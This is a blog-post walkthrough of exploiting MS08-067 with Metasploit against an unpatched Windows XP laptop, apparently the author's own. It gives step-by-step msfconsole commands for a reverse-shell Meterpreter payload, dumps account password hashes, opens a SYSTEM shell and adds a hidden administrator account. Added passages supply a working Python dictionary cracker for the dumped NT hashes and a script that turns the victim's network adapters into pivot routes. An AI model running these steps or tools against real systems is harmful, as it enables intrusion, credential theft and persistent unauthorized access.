Tuesday, February 2, 2010

metasploit [ms08_067] - conficker

Still remember Conficker? What is the damage to your company when this thing spreads?

MS08-067 (KB958644) is the Microsoft patch for the Server service vulnerability, CVE-2008-4250, that Conficker exploits to spread.
Here I am going to attack a machine that has not applied MS08-067, using Metasploit.

requirement:-

system = ubuntu 9.10

apps = metasploit

(I don't/won't show how to install Metasploit on Ubuntu; as system admins, you guys should figure that out yourselves.)


To execute msf, run msfconsole from wherever you installed Metasploit (here /opt/metasploit):

# /opt/metasploit/msfconsole

then load the exploit module and set its options:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
note: RHOST is the remote host, meaning your victim.

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
note: LHOST is the local host, the box you are running msf on. The reverse payload connects back to it, so the victim must be able to reach this address.

msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
note: LPORT is the local port the payload connects back to. We use 4444 as an example.

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
note: set the payload that runs on the victim once the exploit succeeds; reverse_tcp means the victim connects out to LHOST:LPORT.

msf exploit(ms08_067_netapi) > exploit
note: launch the exploit against the victim. The module reaches the Server service over SMB (TCP 445), so that port must be reachable on the victim from your box.


  • Started reverse handler on port 4444
  • Automatically detecting the target…
  • Fingerprint: Windows XP Service Pack 2 – lang:English
  • Selected Target: Windows XP SP2 English (NX)
  • Triggering the vulnerability…
  • Sending stage (725504 bytes)
  • Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)
  • note: see the last line? You have successfully created a session between your box and the victim's box.

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    note: getuid shows which account the Meterpreter server runs as. NT AUTHORITY\SYSTEM is inherited from the exploited Server service, so this is already the highest local privilege; no privilege escalation is needed.

    meterpreter > run hashdump


  • Obtaining the boot key…
  • Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823…
  • Obtaining the user list and keys…
  • Decrypting user keys…
  • Dumping password hashes…

    Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
    chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
    admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    __vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::

    note: run hashdump dumps every local account's password hashes in pwdump format, user:RID:LM hash:NT hash:::. A few things can be read straight off this dump before touching a cracker: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (where an LM hash is present it is far weaker than the NT hash and is the one to crack first); Guest's NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password; and chenghui and admin have identical hashes, so they share a password.
    If you do not want to add a new account to this host, think about how to break the hashes.
    tip: Cain and Abel
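Here is what a dictionary attack such as Cain and Abel's does under the hood, as an added example that is not part of the original post: the NT hash is just MD4 over the UTF-16LE password with no salt, so each candidate word is hashed once and compared against every account. The script first does the cheap triage on the dump (blank passwords, LM hashes present, accounts sharing a hash), then runs the wordlist. The hashdump lines are the post's own output; the extra a13x line (the account the post creates later with P@ssw0rd), its RID 1014 and the wordlist are constructed for this example. MD4 is implemented here from RFC 1320 because many OpenSSL 3 builds no longer expose it through hashlib.

```python
import struct
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

_S = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))          # rotation amounts per round
_R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)  # round-3 message word order
_M = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest of data (pure Python)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1, F(b,c,d) = (b & c) | (~b & d)
            a = _rol((a + ((b & c) | (~b & d)) + x[i]) & _M, _S[0][i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b,c,d), words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rol((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & _M, _S[1][i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            a = _rol((a + (b ^ c ^ d) + x[_R3[i]] + 0x6ED9EBA1) & _M, _S[2][i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & _M, (b + bb) & _M, (c + cc) & _M, (d + dd) & _M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 of the UTF-16LE password, unsalted, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text):
    """Parse pwdump-style 'user:rid:lm:nt:::' lines; anything else is ignored."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[1].isdigit():
            rows.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def triage(rows):
    """Findings that need no cracking at all: {user: [finding, ...]}."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
    findings = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings[r["user"]].append("blank password")
        if r["lm"] != EMPTY_LM:
            findings[r["user"]].append("LM hash stored: password is at most 14 chars, case-folded; crack LM first")
            if r["lm"][16:] == EMPTY_LM[16:]:  # second 7-char half of the LM hash is empty
                findings[r["user"]].append("password is 7 chars or fewer")
        others = [u for u in by_nt[r["nt"]] if u != r["user"]]
        if others:
            findings[r["user"]].append("same password as " + ", ".join(others))
    return dict(findings)


def dictionary_attack(rows, wordlist):
    """Hash each candidate once, then look every account's NT hash up in that table."""
    table = {nt_hash(w): w for w in wordlist}
    return {r["user"]: table[r["nt"]] for r in rows if r["nt"] in table}


# The hashdump from the post, plus one constructed line for the a13x account the post
# creates later with password P@ssw0rd (RID 1014 is an assumption, not a value from the post).
SAMPLE_DUMP = """\
Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
__vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::
""" + f"a13x:1014:{EMPTY_LM}:{nt_hash('P@ssw0rd')}:::\n"

# Constructed wordlist; the empty string is in it on purpose (Guest-style accounts).
WORDLIST = ["", "password", "Password1", "P@ssw0rd", "admin", "letmein"]


if __name__ == "__main__":
    rows = parse_hashdump(SAMPLE_DUMP)
    for user, items in triage(rows).items():
        print(f"{user}: {'; '.join(items)}")
    for user, pw in dictionary_attack(rows, WORDLIST).items():
        print(f"cracked {user}: {pw!r}")
```

Because the NT hash is unsalted, the cost of the attack is one MD4 per candidate word regardless of how many accounts are in the dump, which is why a wordlist of a few million entries finishes in seconds even in pure Python and why a real cracker extends this with rules and brute force. Where the triage reports an LM hash, crack that first: the LM half-hashes are independent 7-character, case-insensitive DES keys, and the recovered LM string only needs its letter case tried against the NT hash.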

    meterpreter > shell
    Process 4288 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    note: the shell command drops into a cmd.exe on the victim, running as SYSTEM like the Meterpreter session. I owned the shell. hehe

    C:\WINDOWS\system32>ipconfig
    ipconfig

    Windows IP Configuration

    Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.81.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.136.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Wireless Network Connection:

    Media State . . . . . . . . . . . : Media disconnected

    Ethernet adapter VirtualBox Host-Only Network:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.56.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.19
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1
    note: ipconfig works. Look at the VMware and VirtualBox host-only adapters: besides the 192.168.1.0/24 we attacked over, this box also sits on 192.168.81.0/24, 192.168.136.0/24 and 192.168.56.0/24, so it can serve as a pivot into those networks.
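A post-exploitation step that the ipconfig output above sets up but the post does not carry out, as an added example that is not code from the post: turn the victim's extra adapters into msfconsole routes so later modules can reach the VMware and VirtualBox networks through the Meterpreter session. The parser is fed the post's own ipconfig output; the attacker address 192.168.1.17 and session id 1 are the post's values; the `route add <subnet> <netmask> <session>` lines are in the form msfconsole's route command accepts and are meant to be pasted into msf, nothing here talks to Metasploit itself.

```python
import ipaddress
import re

# "Ethernet adapter VMware Network Adapter VMnet8:" style headers and the three fields we need
ADAPTER_RE = re.compile(r"^(?:Ethernet|PPP|Tunnel) adapter (.+):$")
FIELD_RE = re.compile(r"^(IP Address|Subnet Mask|Default Gateway)[ .]*:\s*(.*)$")
_KEYS = {"IP Address": "ip", "Subnet Mask": "mask", "Default Gateway": "gateway"}


def parse_ipconfig(text):
    """Return {adapter: {"ip", "mask", "gateway"}} for adapters that currently hold an address.

    An adapter reported as 'Media disconnected' has no IP Address line and is dropped.
    """
    adapters, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = ADAPTER_RE.match(line)
        if m:
            current = m.group(1)
            adapters[current] = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            adapters[current][_KEYS[m.group(1)]] = m.group(2).strip()
    return {name: a for name, a in adapters.items() if a.get("ip")}


def pivot_routes(adapters, attacker_ip, session_id):
    """One 'route add <net> <mask> <session>' line per victim subnet we are not already on."""
    attacker = ipaddress.ip_address(attacker_ip)
    routes = []
    for name in sorted(adapters):
        a = adapters[name]
        net = ipaddress.ip_network(f"{a['ip']}/{a['mask']}", strict=False)
        if attacker in net:  # the subnet we exploited over; no pivot needed for it
            continue
        routes.append(f"route add {net.network_address} {net.netmask} {session_id}")
    return routes


# ipconfig output captured in the post (the victim, 192.168.1.19)
IPCONFIG = """
Windows IP Configuration

Ethernet adapter VMware Network Adapter VMnet8:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.81.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter VMware Network Adapter VMnet1:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.136.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter Wireless Network Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter VirtualBox Host-Only Network:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.19
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
"""

if __name__ == "__main__":
    for line in pivot_routes(parse_ipconfig(IPCONFIG), "192.168.1.17", 1):
        print(line)
```

The victim's .1 addresses on the VMware and VirtualBox adapters mark it as the host side of those virtual networks, so any guests running on it are reachable only through this box; that is the case where a route through the session is the only way in.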


    C:\WINDOWS\system32>net user a13x P@ssw0rd /add
    net user a13x P@ssw0rd /add
    The command completed successfully.
    note: I tried adding a user. ^^ Please practice the Windows commands.

    C:\WINDOWS\system32>net localgroup Administrators a13x /add
    net localgroup Administrators a13x /add
    The command completed successfully.
    note: I added myself to the Administrators group. Damn evil.

    You can play with this host using Windows commands like net view, net use, tasklist, taskkill, net start (to list services) and so on.
    Please practice more with Windows commands.

    The victim is my laptop, running Windows XP SP2 with the Windows firewall on and McAfee disabled.

  • ENJOY HACKING, but please do not harm other people, because that is computer misuse. You can be sent to jail!!
